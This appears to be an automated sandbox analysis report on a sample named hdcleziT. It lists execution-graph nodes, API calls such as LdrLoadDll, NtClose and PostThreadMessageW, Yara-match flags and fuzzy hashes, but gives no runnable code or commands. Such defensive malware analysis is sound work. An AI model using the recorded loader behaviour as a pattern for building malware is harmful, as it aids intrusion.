                                                                                                    • Instruction Fuzzy Hash: 9121D6B16403199BDB12DF29CC80BAE73B9EF40311F108191FE9497344DB38ED119AA0

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:1.2%
                                                                                                    Dynamic/Decrypted Code Coverage:4.6%
                                                                                                    Signature Coverage:3.9%
                                                                                                    Total number of Nodes:152
                                                                                                    Total number of Limit Nodes:13
                                                                                                    execution_graph 93778 425143 93779 42515c 93778->93779 93780 4251a4 93779->93780 93783 4251e4 93779->93783 93785 4251e9 93779->93785 93786 42ebe3 93780->93786 93784 42ebe3 RtlFreeHeap 93783->93784 93784->93785 93789 42ce73 93786->93789 93788 4251b4 93790 42ce90 93789->93790 93791 42cea1 RtlFreeHeap 93790->93791 93791->93788 93792 42fce3 93793 42ebe3 RtlFreeHeap 93792->93793 93794 42fcf8 93793->93794 93795 42fc83 93796 42fc93 93795->93796 93797 42fc99 93795->93797 93800 42ecc3 93797->93800 93799 42fcbf 93803 42ce23 93800->93803 93802 42ecde 93802->93799 93804 42ce40 93803->93804 93805 42ce51 RtlAllocateHeap 93804->93805 93805->93802 93806 424da3 93807 424dbf 93806->93807 93808 424de7 93807->93808 93809 424dfb 93807->93809 93810 42cb13 NtClose 93808->93810 93816 42cb13 93809->93816 93812 424df0 93810->93812 93813 424e04 93819 42ed03 RtlAllocateHeap 93813->93819 93815 424e0f 93817 42cb30 93816->93817 93818 42cb41 NtClose 93817->93818 93818->93813 93819->93815 93852 42c0f3 93853 42c110 93852->93853 93856 24cf2df0 LdrInitializeThunk 93853->93856 93854 42c138 93856->93854 93820 41a903 93821 41a91b 93820->93821 93823 41a975 93820->93823 93821->93823 93824 41e873 93821->93824 93825 41e899 93824->93825 93829 41e996 93825->93829 93830 42fd23 RtlAllocateHeap RtlFreeHeap 93825->93830 93827 41e934 93827->93829 93831 42c143 93827->93831 93829->93823 93830->93827 93832 42c15d 93831->93832 93835 24cf2c0a 93832->93835 93833 42c189 93833->93829 93836 24cf2c1f LdrInitializeThunk 93835->93836 93837 24cf2c11 93835->93837 93836->93833 93837->93833 93838 414083 93839 4140a9 93838->93839 93840 4140d3 93839->93840 93842 413e03 LdrInitializeThunk 93839->93842 93842->93840 93843 4191a3 93845 4191d3 93843->93845 93846 4191ff 93845->93846 93847 41b673 93845->93847 93849 41b6b7 93847->93849 93848 41b6d8 93848->93845 93849->93848 93850 42cb13 NtClose 93849->93850 93850->93848 93857 414373 93858 41438c 93857->93858 93863 417b33 93858->93863 93860 4143aa 93861 4143f6 93860->93861 93862 4143e3 PostThreadMessageW 93860->93862 93862->93861 93865 417b57 93863->93865 93864 417b5e 93864->93860 93865->93864 93867 417b7d 93865->93867 93870 430063 LdrLoadDll 93865->93870 93868 417b93 LdrLoadDll 93867->93868 93869 417baa 93867->93869 93868->93869 93869->93860 93870->93867 93871 401af2 93872 401b20 93871->93872 93873 401bf3 EntryPoint 93872->93873 93874 401c20 93873->93874 93877 430153 93874->93877 93880 42e793 93877->93880 93881 42e7b9 93880->93881 93892 4075c3 93881->93892 93883 42e7cf 93884 401c2a 93883->93884 93895 41b483 93883->93895 93886 42e7ee 93887 42e803 93886->93887 93910 42cec3 93886->93910 93906 428683 93887->93906 93890 42e81d 93891 42cec3 ExitProcess 93890->93891 93891->93884 93913 4167e3 93892->93913 93894 4075d0 93894->93883 93896 41b4af 93895->93896 93924 41b373 93896->93924 93899 41b4dc 93902 42cb13 NtClose 93899->93902 93904 41b4e7 93899->93904 93900 41b510 93900->93886 93901 41b4f4 93901->93900 93903 42cb13 NtClose 93901->93903 93902->93904 93905 41b506 93903->93905 93904->93886 93905->93886 93907 4286e4 93906->93907 93909 4286f1 93907->93909 93935 4189a3 93907->93935 93909->93890 93911 42cee0 93910->93911 93912 42cef1 ExitProcess 93911->93912 93912->93887 93914 416800 93913->93914 93916 416819 93914->93916 93917 42d573 93914->93917 93916->93894 93918 42d58d 93917->93918 93919 42d5bc 93918->93919 93920 42c143 LdrInitializeThunk 93918->93920 93919->93916 93921 42d61c 93920->93921 93922 42ebe3 RtlFreeHeap 93921->93922 93923 42d635 93922->93923 93923->93916 93925 41b38d 93924->93925 93929 41b469 93924->93929 93930 42c1e3 93925->93930 93928 42cb13 NtClose 93928->93929 93929->93899 93929->93901 93931 42c1fd 93930->93931 93934 24cf35c0 LdrInitializeThunk 93931->93934 93932 41b45d 93932->93928 93934->93932 93937 4189cd 93935->93937 93936 418edb 93936->93909 93937->93936 93943 413fe3 93937->93943 93939 418afa 93939->93936 93940 42ebe3 RtlFreeHeap 93939->93940 93941 418b12 93940->93941 93941->93936 93942 42cec3 ExitProcess 93941->93942 93942->93936 93947 414003 93943->93947 93945 41406c 93945->93939 93947->93945 93948 41b793 93947->93948 93949 41b7b8 93948->93949 93955 429e23 93949->93955 93951 414062 93951->93939 93952 41b7e9 93952->93951 93954 42ebe3 RtlFreeHeap 93952->93954 93960 41b5d3 LdrInitializeThunk 93952->93960 93954->93952 93957 429e87 93955->93957 93956 429eba 93956->93952 93957->93956 93961 413e43 93957->93961 93959 429e9c 93959->93952 93960->93952 93962 413e0e 93961->93962 93965 413e52 93961->93965 93966 42cd93 93962->93966 93967 42cdad 93966->93967 93970 24cf2c70 LdrInitializeThunk 93967->93970 93968 413e25 93968->93959 93970->93968 93851 24cf2b60 LdrInitializeThunk

                                                                                                    Executed Functions

                                                                                                    Function 00401560 Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 561COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000001.2169352887.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_1_400000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$B$a```$gfff$gfff$gfff$gfff
                                                                                                    • API String ID: 0-3667867154
                                                                                                    • Opcode ID: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                                                    • Instruction ID: 4d4c1e64281832a49f187a404ecdf2e47e159528420c40e4fc39f5ea6f09713e
                                                                                                    • Opcode Fuzzy Hash: 50a344c5d8cad1bac2f9cdccde6dd67feee0f91bdaaa4a749f4ed1f71307396b
                                                                                                    • Instruction Fuzzy Hash: 3C021771F0011947DB2C9959CC95BFE726AE794304F5881BBEA0AEF3E1E6389F448B44
                                                                                                    Function 00417B33 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 120 417b33-417b4f 121 417b57-417b5c 120->121 122 417b52 call 42f7c3 120->122 123 417b62-417b70 call 42fdc3 121->123 124 417b5e-417b61 121->124 122->121 127 417b80-417b91 call 42e263 123->127 128 417b72-417b7d call 430063 123->128 133 417b93-417ba7 LdrLoadDll 127->133 134 417baa-417bad 127->134 128->127 133->134
                                                                                                    APIs
                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 2234796835-0
                                                                                                    • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                    • Instruction ID: 331d18eb78583633b9e29c6af9a4f26b0dc20ce173b82e1c0a0b08c061dba126
                                                                                                    • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                    • Instruction Fuzzy Hash: 780112B5E4410DA7DB10DAA5DC42FDEB3789F54708F0041A6E90897240F635EB588795
                                                                                                    Function 0042CB13 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 158 42cb13-42cb4f call 404973 call 42dd63 NtClose
                                                                                                    APIs
                                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CB4A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 3535843008-0
                                                                                                    • Opcode ID: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                                                    • Instruction ID: 71597bb0a06a303982d629d451bdfe7f1673587ba4a769b47156b06249900e13
                                                                                                    • Opcode Fuzzy Hash: 621a3b87d4f233dfb6b6f7d7240c0c3b66d092fca9b72b9a237939f90996aef9
                                                                                                    • Instruction Fuzzy Hash: 44E0DF312002003BD220AA2AEC42F9B735CDBC5710F00441AFA09A7141C670790187E4
                                                                                                    Function 24CF2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 1c56783c921d175f6924bd65688631a727c1e4b9dcb49df4808649c9836e1e4c
                                                                                                    • Instruction ID: de82eccf7ae631377d231d63f66a576cca8d3b4f3198ee97b50534f793839dc0
                                                                                                    • Opcode Fuzzy Hash: 1c56783c921d175f6924bd65688631a727c1e4b9dcb49df4808649c9836e1e4c
                                                                                                    • Instruction Fuzzy Hash: 5B90023524588842D2107158844474A00155BD0305F59D415B4425768D8695C9917121
                                                                                                    Function 24CF2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 051dac382a95e99ea5e2441a02543fde4283e54d3eb941535f4f0d1d17d75739
                                                                                                    • Instruction ID: 3d52531d4628f6d8e93704b6768656c10b0b6611db8b27de814227e02afbc379
                                                                                                    • Opcode Fuzzy Hash: 051dac382a95e99ea5e2441a02543fde4283e54d3eb941535f4f0d1d17d75739
                                                                                                    • Instruction Fuzzy Hash: 2590023524580453D2117158454470700195BD0345F95D416B0425768D9656CA52A121
                                                                                                    Function 24CF2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 172 24cf2b60-24cf2b6c LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: b668dd1abd96606e7d1939c8a11aec16607f504faabf94bca1680fa908cb735f
                                                                                                    • Instruction ID: 86744fdbec1bbdbc0bd762edd21adee48915cabeef7addf34d1fbdd85e75b451
                                                                                                    • Opcode Fuzzy Hash: b668dd1abd96606e7d1939c8a11aec16607f504faabf94bca1680fa908cb735f
                                                                                                    • Instruction Fuzzy Hash: 3B90026524680043420571584454616401A5BE0305B55D025F10157A0DC525C9916125
                                                                                                    Function 24CF35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: bb6c7eba7a0d620bd2301035e4c7cc2da0d74be4e9485d79e4e6bcd4788087aa
                                                                                                    • Instruction ID: 4d45a2ed991481219b4da12e8811d0e6076ca8e668870cbc04e0391e2a8a04a9
                                                                                                    • Opcode Fuzzy Hash: bb6c7eba7a0d620bd2301035e4c7cc2da0d74be4e9485d79e4e6bcd4788087aa
                                                                                                    • Instruction Fuzzy Hash: DB90023564990442D2007158455470610155BD0305F65D415B0425778D8795CA5165A2
                                                                                                    Function 00414370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(0j0OId92L,00000111,00000000,00000000), ref: 004143F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID: 0j0OId92L$0j0OId92L
                                                                                                    • API String ID: 1836367815-695469284
                                                                                                    • Opcode ID: bc8f5dee4bc18de4b9c16e2d65e2f97c7383ca15b1cbc30e1dcfe26fbc382a00
                                                                                                    • Instruction ID: 395257a172b6fb01821a03ae621abc39386921b5435d80e57e368608866d07a4
                                                                                                    • Opcode Fuzzy Hash: bc8f5dee4bc18de4b9c16e2d65e2f97c7383ca15b1cbc30e1dcfe26fbc382a00
                                                                                                    • Instruction Fuzzy Hash: 0801C471E41218B6EB21A7D2DD02FDF7B78DF81B14F00806AFA047B180D7B856468BE9
                                                                                                    Function 00414373 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 14 414373-414383 15 41438c-4143e1 call 42f693 call 417b33 call 4048e3 call 425283 14->15 16 414387 call 42ec83 14->16 25 414403-414408 15->25 26 4143e3-4143f4 PostThreadMessageW 15->26 16->15 26->25 27 4143f6-414400 26->27 27->25
                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(0j0OId92L,00000111,00000000,00000000), ref: 004143F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID: 0j0OId92L$0j0OId92L
                                                                                                    • API String ID: 1836367815-695469284
                                                                                                    • Opcode ID: 270c509a88a863fe0634043b7060cc8d830b64c78b137e5f7cde7d2a5c309eed
                                                                                                    • Instruction ID: ae0f3591e816a9f46982110179c6327102946865d15a57d5eabb58516dd05135
                                                                                                    • Opcode Fuzzy Hash: 270c509a88a863fe0634043b7060cc8d830b64c78b137e5f7cde7d2a5c309eed
                                                                                                    • Instruction Fuzzy Hash: E601DB71E4021876DB11A6D29C02FDF7B7C9F41B14F04806AFA047B2C1D6B856068BE9
                                                                                                    Function 00401AF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 28 401af2-401b18 29 401b20-401b33 28->29 29->29 30 401b35-401b51 call 4010e0 29->30 33 401b56-401b5c 30->33 33->33 34 401b5e-401b82 call 401d70 33->34 37 401b87-401b8d 34->37 37->37 38 401b8f-401b9e 37->38 39 401ba3-401ba4 38->39 39->39 40 401ba6-401bab 39->40 41 401bb0-401bc1 40->41 41->41 42 401bc3-401bd8 41->42 42->42 43 401bda-401bdf 42->43 44 401be0-401bf1 43->44 44->44 45 401bf3-401c19 EntryPoint 44->45 46 401c20-401c26 45->46 46->46 47 401c28 call 430153 46->47 48 401c2a-401c2d 47->48 49 401c32-401c45 48->49 49->49 50 401c47-401c4c 49->50 51 401c50-401c61 50->51 51->51 52 401c63-401c78 51->52
                                                                                                    APIs
                                                                                                    • EntryPoint.HDCLEZIT(?,0000032C,?), ref: 00401BFF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EntryPoint
                                                                                                    • String ID: a```
                                                                                                    • API String ID: 3225343992-3259403941
                                                                                                    • Opcode ID: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                                                    • Instruction ID: 9cd544999dd2b03daafdb1c4164150612a4eeb260070e7f16c4efc787f4e75c6
                                                                                                    • Opcode Fuzzy Hash: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                                                    • Instruction Fuzzy Hash: ED31F771F042194BDF1C86288C507AEB666DB94344F4881BBE909AF7E1E6786E448B84
                                                                                                    Function 0042CE73 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 54 42ce73-42ceb7 call 404973 call 42dd63 RtlFreeHeap
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CEB2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID: whA
                                                                                                    • API String ID: 3298025750-33568622
                                                                                                    • Opcode ID: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                                                    • Instruction ID: df9e10e1718a61ed7688cb98799c3328294b3d2316893391272a51bf3c6f2a62
                                                                                                    • Opcode Fuzzy Hash: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                                                    • Instruction Fuzzy Hash: 5EE06DB26002047BD610EF59EC81EAB33ACEFC5710F40401AFA08A7241C671B910CBF9
                                                                                                    Function 00417BB3 Relevance: 1.6, APIs: 1, Instructions: 105libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 98 417bb3-417bc4 99 417b81-417b83 98->99 100 417bc6-417bd3 98->100 101 417b89-417b91 99->101 102 417b84 call 42e263 99->102 103 417bd5-417bd6 100->103 104 417bd7-417bde 100->104 105 417b93-417ba7 LdrLoadDll 101->105 106 417baa-417bad 101->106 102->101 103->104 107 417be1-417be7 104->107 105->106 108 417be9 107->108 109 417bed-417bf5 107->109 111 417bea 108->111 112 417c5f-417c64 108->112 110 417bfa-417c03 109->110 114 417c41-417c55 110->114 111->110 116 417beb-417bec 111->116 112->114 115 417c66-417c6f 112->115 114->107 117 417c57-417c58 114->117 118 417c71-417c91 115->118 116->109 117->118 119 417c5a-417c5e 117->119 119->112
                                                                                                    APIs
                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 2234796835-0
                                                                                                    • Opcode ID: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                                                    • Instruction ID: 93b2374f167c02f6a28249779b1fd5adc8fce152e1fc3efdeaf84b546dfcf957
                                                                                                    • Opcode Fuzzy Hash: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                                                    • Instruction Fuzzy Hash: 4421C07294C206ABDB00E9749846ACB7774FB45318F04455AD80C9B702E739B6968BD5
                                                                                                    Function 00417B27 Relevance: 1.5, APIs: 1, Instructions: 35libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 135 417b27-417b30 136 417b90-417ba7 LdrLoadDll 135->136 137 417b32-417b5c call 42f7c3 135->137 138 417baa-417bad 136->138 142 417b62-417b70 call 42fdc3 137->142 143 417b5e-417b61 137->143 146 417b80-417b91 call 42e263 142->146 147 417b72-417b7d call 430063 142->147 146->138 152 417b93-417ba7 LdrLoadDll 146->152 147->146 152->138
                                                                                                    APIs
                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 2234796835-0
                                                                                                    • Opcode ID: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                                                    • Instruction ID: 520125f5abcca6f32ee259adfec299557dcb37a3b4497778880cbe12b8f3150b
                                                                                                    • Opcode Fuzzy Hash: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                                                    • Instruction Fuzzy Hash: A4F02BB190C24DABCB20CE64DC409DDBB74AF55234F0487EED998671C2E2305649C756
                                                                                                    Function 0042CE23 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 153 42ce23-42ce67 call 404973 call 42dd63 RtlAllocateHeap
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(?,0041E934,?,?,00000000,?,0041E934,?,?,?), ref: 0042CE62
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                                                    • Instruction ID: 54a44c9eb01fc689f5ac2f601c65d0757ab140ae4e4e75f286cde17a1d142988
                                                                                                    • Opcode Fuzzy Hash: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                                                    • Instruction Fuzzy Hash: 86E06DB52042047BD620EE59EC45EEB37ADEFC5710F40441AFA48A7241CA70B9108BB9
                                                                                                    Function 0042CEC3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 163 42cec3-42ceff call 404973 call 42dd63 ExitProcess
                                                                                                    APIs
                                                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,43F334D9,?,?,43F334D9), ref: 0042CEFA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_hdcleziT.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExitProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 621844428-0
                                                                                                    • Opcode ID: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                                                    • Instruction ID: 54eb179f5a4ec7a69d43dd70d9c2d94cb10809d16adc756a8638f1923563bae3
                                                                                                    • Opcode Fuzzy Hash: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                                                    • Instruction Fuzzy Hash: 64E04F712102147BD120EA6ADC41F9BB76CDBC5714F40802AFA08A7281C670B90187F4
                                                                                                    Function 24CF2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 168 24cf2c0a-24cf2c0f 169 24cf2c1f-24cf2c26 LdrInitializeThunk 168->169 170 24cf2c11-24cf2c18 168->170
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: ebfee78e2707d888e9f4cf043ca152cf2b2f55722ebed71b7a38f846ae232ace
                                                                                                    • Instruction ID: 3e015402ffb24f1a720d62b6f31a4146f9dde99ca73fb939c5dea555fbf289ee
                                                                                                    • Opcode Fuzzy Hash: ebfee78e2707d888e9f4cf043ca152cf2b2f55722ebed71b7a38f846ae232ace
                                                                                                    • Instruction Fuzzy Hash: CEB092769469C5CAEB42E7644A08B0B7A11BBD0705F2BC066E2030B92F473DC2D1E2B6

                                                                                                    Non-executed Functions

                                                                                                    Function 24D68D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 24D68E86
                                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 24D68E4B
                                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 24D68D8C
                                                                                                    • read from, xrefs: 24D68F5D, 24D68F62
                                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 24D68E02
                                                                                                    • This failed because of error %Ix., xrefs: 24D68EF6
                                                                                                    • The instruction at %p referenced memory at %p., xrefs: 24D68EE2
                                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 24D68F2D
                                                                                                    • The instruction at %p tried to %s , xrefs: 24D68F66
                                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 24D68DB5
                                                                                                    • *** enter .cxr %p for the context, xrefs: 24D68FBD
                                                                                                    • *** Inpage error in %ws:%s, xrefs: 24D68EC8
                                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 24D68DD3
                                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 24D68E3F
                                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 24D68DA3
